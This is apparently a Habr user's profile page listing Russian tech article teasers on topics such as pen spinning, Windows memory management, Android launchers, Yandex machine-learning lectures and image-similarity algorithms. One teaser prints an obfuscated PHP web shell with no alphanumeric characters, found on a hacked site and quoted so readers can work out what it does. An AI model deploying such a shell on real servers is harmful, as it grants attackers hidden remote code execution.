Search
Write a publication
Pull to refresh
17
0
Павел Чигер @Gesper

Пользователь

Send message

PenSpinning — спорт для программистов!

Reading time1 min
Views4.5K
image
Что такое PenSpinning? Это, можно сказать, эдакий вид спорта. На русский правильнее всего переводится «манипулирование ручкой». Сам он появился относительно недавно и распространен в России мало, хотя в азиатских странах развит очень неплохо.
Наверное, каждый, сидев в свое время на лекции, начинал специально или непроизвольно крутить ручку в пальцах — вот это и есть пенспиннинг. Все дело не в том, что и где крутить, а в том, как :) Само по себе это занятие помогает не только скоротать время, но и доставляет массу удовольствия, кроме того, при должной тренировке со стороны это выглядит очень даже круто! В России уже существует несколько сообществ пенспиннеров, и на их умение действительно стоит посмотреть. Кстати, по количеству вариантов моддинга ручек этот «вид спорта» дает сто очков вперед любому другому, например, стритрейсингу!

Ну и, для разогрева, пример!

Сайт российского сообщества пенспиннеров

UPD: все о Penspinning на торрентах:
torrents.ru/forum/viewtopic.php?t=984359
torrents.ru/forum/viewtopic.php?t=1687450
Спасибо юзернейму TimTowdy!
UPD2: Отличная подборка обучающего видео онлайн

Mirror's Edge 2D — полная версия

Reading time1 min
Views2.2K
image

Свершилось :) Формально, игра ещё находится в статусе «бета», но, исключительно, из-за несущественных багов. Ввиду наплыва посетителей и всеобщего ажиотажа, поиграть на сайте возможности нет, поэтому, вот ссылка сразу на swf файл.

Бета Quake Live станет открытой для всех

Reading time1 min
Views876
Quake Live front page image

Браузерная версия легендарной Quake III станет доступной для открытого бета-тестирования уже 24-го февраля!

Вот, что пишут разработчики на официальном форуме:
«Перво наперво, мы хотим поблагодарить всех, кто играл, тестировал, писал отзывы, приглашал друзей и, надеемся, наслаждался закрытой бетой QUAKE LIVE. Мы значительно выросли за последние 6 месяцев и теперь счастливы объявить, что во вторник вечером мы делаем QUAKE LIVE доступным для всех желающих в виде открытой бета-версии.»

Here be dragons: Управление памятью в Windows как оно есть [3/3]

Reading time5 min
Views148K

Каталог:
Один
Два
Три

μTorrent


Это, пожалуй, самая забавная часть. При очевидно высоких навыках программирования, авторы либо не читали, либо не поняли вот этот документ. Вот что происходит с дефолтными настройками:
Читать дальше →

Here be dragons: Управление памятью в Windows как оно есть [2/3]

Reading time5 min
Views40K

Каталог:
Один
Два
Три

Оказывается длинные опусы нужно разбивать. А я то думал «многосерийные» топики публикуют исключительно для зарабатывания рейтинга :-)

Продолжу с места в карьер, так как где разбилось — там разбилось, а писать дополнительные введения к каждой серии выше моих сил.
Читать дальше →

Here be dragons: Управление памятью в Windows как оно есть [1/3]

Reading time8 min
Views181K

Каталог:
Один
Два
Три

Менеджер памяти (и связанные с ним вопросы контроллера кеша, менеджера ввода/вывода и пр) — одна из вещей, в которой (наряду с медициной и политикой) «разбираются все». Но даже люди «изучившие винду досконально» нет-нет, да и начинают писать чепуху вроде (не говоря уже о другой чепухе, написанной там же):
Грамотная работа с памятью!!! За все время использования у меня своп файл не увеличился ни на Килобайт. По этому Фаерфокс с 10-20 окнами сворачивается / разворачивается в/из трея как пуля. Такого эффекта я на винде добивался с отключенным свопом и с переносом tmp файлов на RAM диск.

Или к примеру μTorrent — у меня нет никаких оснований сомневаться в компетентности его авторов, но вот про работу памяти в Windows они со всей очевидностью знают мало. Не забываем и товарищей, производящих софт для слежения за производительностью и не имеющих ни малейшего понятия об управлении памятью в Windows (и поднявших по этому поводу истерику на пол интернета, на Ars-е даже был разбор полетов). Но самое потрясающее, что я видел всвязи с управлением памятью — это совет переместить pagefile на RAM-диск:
Из моих трех гигабайт под RAM disk был выделен один (на тот момент, когда на лаптопе еще была установлена XP), на котором я создал своп на 768МБ ...

Цель данной статьи — не полное описание работы менеджера памяти (не хватит ни места ни опыта), а попытка пролить хоть немного света на темное царство мифов и суеверий, окружающих вопросы управления памятью в Windows.
Читать дальше →

В поисках оптимизации загрузки Vista

Reading time3 min
Views4.9K
Время, требуемое для загрузки операционной системы, для многих пользователей является достаточно критичным фактором, особенно для владельцев ноутбуков. Нормальное время от прохождения BIOS до загрузки рабочего стола в Windows Vista составляет в среднем 25-90 секунд, в зависимости от конфигурации оборудования, драйверов и работы сервисов. Иногда пользователи сталкиваются с ситуацией, когда время загрузки системы растягивается до неприемлимых 5-10 минут, что сигнализирует о проблеме, которую необходимо решить во избежание возможных неприятностей со стабильностью и вероятной потерей данных.

Пока я загружаюсь, вы можете выгулять свою собачку

В этой небольшой статье попробуем рассмотреть решение подобных неприятностей с помощью встроенных в Vista средств мониторинга. На русском языке почему-то этого никто ранее не делал.
Читать дальше →

Выбираем лаунчер для телефонов с Android

Reading time6 min
Views192K
Представляю вам вольный перевод статьи "Android Home Screen Launchers: Six of the Best"

Вся прелесть операционной системы Android заключается в том, что буквально все настраивается, поскольку платформа имеет открытый исходный код. Другие мобильные операционные системы предоставляют мало возможностей для настройки главного домашнего экрана вашего телефона, однако, Android имеет сразу несколько приложений, которые могут изменить вид главного рабочего стола вашего телефона. Такие приложения называются «лаунчеры», эти приложения позволяют настраивать способ отображения экрана, когда вы нажимаете кнопку «Домой» (Home) на вашем телефоне. Самое приятное в лаунчерах то, насколько просто заменить обычный рабочий стол на более функциональны. Для этого достаточно совершить простые действия: скачать, установить и настроить параметры.
Под катом обзор лаунчеров, скриншоты и QR-коды

Жизнь разработчика (в картинках)

Reading time1 min
Views67K
Взято отсюда специально для хабра. Возможно, в некоторых из ситуаций вы узнаете себя.

Когда я показываю босу, что окончательно пофиксил баг



Когда проджект-менеджер входит в офис



Читать дальше →

Лекции от Яндекса для тех, кто хочет провести каникулы с пользой. Дискретный анализ и теория вероятностей

Reading time3 min
Views144K
Для тех, кому одного курса на праздники мало и кто хочет больше, продолжаем нашу серию курсов от Школы анализа данных Яндекса. Сегодня подошла очередь курса «Дискретный анализ и теория вероятностей» – даже более фундаментального, чем предыдущий. Но без него нельзя представить ещё большую часть современной обработки данных.

В рамках курса рассматриваются основные понятия и методы комбинаторного, дискретного и асимптотического анализа, теории вероятностей, статистики и на примере решения классических задач демонстрируется их применение.



Читает курс Андрей Райгородский. Доктор физико-математических наук. Профессор кафедры математической статистики и случайных процессов механико-математического факультета МГУ им. М. В. Ломоносова. Заведующий кафедрой Дискретной математики ФИВТ МФТИ. Профессор и научный руководитель бакалавриата кафедры «Анализ данных» факультета инноваций и высоких технологий МФТИ. Руководитель отдела теоретических и прикладных исследований компании «Яндекс». (Ещё больше можно узнать в статье о нём на Википедии).

Содержание курса и тезисы лекций

Machine Learning. Курс от Яндекса для тех, кто хочет провести новогодние каникулы с пользой

Reading time8 min
Views266K
Новогодние каникулы – хорошее время не только для отдыха, но и для самообразования. Можно отвлечься от повседневных задач и посвятить несколько дней тому, чтобы научиться чему-нибудь новому, что будет помогать вам весь год (а может и не один). Поэтому мы решили в эти выходные опубликовать серию постов с лекциями курсов первого семестра Школы анализа данных.

Сегодня — о самом важном. Современный анализ данных без него представить невозможно. В рамках курса рассматриваются основные задачи обучения по прецедентам: классификация, кластеризация, регрессия, понижение размерности. Изучаются методы их решения, как классические, так и новые, созданные за последние 10–15 лет. Упор делается на глубокое понимание математических основ, взаимосвязей, достоинств и ограничений рассматриваемых методов. Отдельные теоремы приводятся с доказательствами.



Читает курс лекций Константин Вячеславович Воронцов, старший научный сотрудник Вычислительного центра РАН. Заместитель директора по науке ЗАО «Форексис». Заместитель заведующего кафедрой «Интеллектуальные системы» ФУПМ МФТИ. Доцент кафедры «Математические методы прогнозирования» ВМиК МГУ. Эксперт компании «Яндекс». Доктор физико-математических наук.
Содержание и видео всех лекций курса

Анатомия рекомендательных сервисов (Часть 1)

Reading time7 min
Views16K
Рады опубликовать интересную, на наш взгляд, статью нашего друга Николая Михайловского (хабропользователь nickm197). Думаем, что она будет интересна всем, кто профессионально работает в ecommerce.

Вступление

Когда мы приходим к потенциальным заказчикам рассказывать про сервис персонализации crossss, один из частых вопросов: «А как он внутри устроен-то?». Пользуясь дружественным блогом компании CentroBit, расскажу немного теорию и практику устройства рекомендательных сервисов.

Получилось так, что по ходу написания статья стала становиться уж слишком большой, поэтому я решил ограничиться сейчас первой частью, после которой придется написать как минимум еще одну, а то и две.

Начнем с самых азов и философии.

Читать дальше →

Алгоритм быстрого нахождения похожих изображений

Reading time8 min
Views64K

Введение


Недавно наткнулся на статью, размещенную на Хабрахабре, посвященную сравнению изображений «Выглядит похоже». Как работает перцептивный хэш. Так как я сам достаточно долго занимался этой тематикой (являюсь автором программы AntiDupl), то мне захотелось поделиться здесь своим опытом по данному вопросу. В статье я приведу два варианта алгоритма сравнения похожих изображений — базовый и улучшенный. Все они были проверены автором на практике в рамках указанного выше проекта. Изложение мое будет вестись без строгих доказательств, сложных формул и специальной математической терминологии. Надеюсь, что читатели простят меня за это.

Базовый Алгоритм


Мера схожести изображений


При сравнении похожих изображений первым встает вопрос: что считать мерой схожести изображений? Очевидно, что это величина имеет значение обратное различию изображений друг от друга. Следственно нужно выбрать некую метрику, характеризующую различие изображений друг от друга. Тогда схожими изображениями будут считаться изображения, отличие между которыми меньше некоторого порога. Для изображений с одинаковыми габаритами, обычно такой мерой различия служит среднеквадратическое отклонение пикселей одного изображения от другого. Хотя конечно, нам ни что не мешает выбрать другую метрику, например усредненную абсолютную разность пикселей изображений друг от друга.
Читать дальше →

PHP-шелл без единого буквенно-цифрового символа

Reading time1 min
Views89K
Вчера в блоге компании Sucuri появился любопытный вопрос: некий владелец сайта, обнаружив его взломанным, был немало удивлён, обнаружив следующий злонамеренный код; что именно он делает?
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Как видно, в коде нет ни вызовов функций, ни вообще какого-либо буквенно-цифрового символа.
Узнать подробности

Как легко потерять домен с миллионной посещаемостью

Reading time4 min
Views199K
Друзья, некоторые из вас, к своему огорчению или к чьей-то радости, заметили, что наш сервис по адресу prostopleer.com не открывается уже неделю. В этом посте я хочу рассказать, как вы легко можете потерять домен с полуторамиллионной ежесуточной посещаемостью.

Версии в интернете бродили самые разные: от нового закона до старых добрых жалоб правообладателей

Новый адрес сервиса Pleer.com.
Читать дальше →

Разработка веб приложения на основе Java EE+JSP+Hibernate+Maven+Spring MVC в NetBeans. Часть 1

Reading time13 min
Views172K

Вступление


Это будет серия статей, помогающих начинающим Java разработчикам в их нелегком пути. Покажу пример создания интернет магазина.
Первое что вам понадобится — это NetBeans 7.3. Скачать можно здесь.
Почему именно он? Думаю для начинающих в ЕЕ — это идеальный вариант.

Используемые технологии:
Читать дальше →

Баланс в играх жанра Tower Defense (часть 2)

Reading time9 min
Views35K
В первой части мы начали рассказывать о балансе юнитов в нашей игре жанра TD, которая неплохо себя показала, добравшись до топовых мест в своих жанрах US, RU и др. Appstore, получила фичеринг в разделе «Игры» в RU Google Play и в New&Noteworthy в 60 странах Appstore.
В данной статье мы затронем тему создания новых типов башен по принципу «от рассмотренной ситуации – к юниту», расскажем о расчете параметров крипов и дадим описание бонусов.


Читать дальше →

Записи докладов с конференций по высоким нагрузкам HPC

Reading time1 min
Views17K
Записи с последней конференции HPC — High Performance Conference, состоявшейся 6 декабря 2012, никак не анонсировались, хотя заслуживают внимания.

Под катом видеозаписи следующих докладов:

  1. Практические вопросы использования NOSQL в высоконагруженном проекте
    Дмитрий Ананьев, Руководитель группы разработки новых сервисов, Мамба
  2. Как работает «умная живая миграция» в Jelastic
  3. Дмитрий Лазаренко, Директор R&D, Jelastic Russia
  4. Parallels Cloud Server как платформа для высокопроизводительных систем
    Дмитрий Мишин, Team-lead отдела серверной виртуализации, Parallels
  5. Облачная платформа Windows Azure для высоконагруженных проектов
    Владимир Юнев, Technical evangelist, DPE, Microsoft Russia


и одно видео с фестиваля профессионального развития BitByte:

  1. Badoo Desktop: оптимизация приложения на миллион юзеров
    Руководитель проекта десктопных приложений компании Badoo.



Читать дальше →

Information

Rating
Does not participate
Location
Минск, Минская обл., Беларусь
Date of birth
Registered
Activity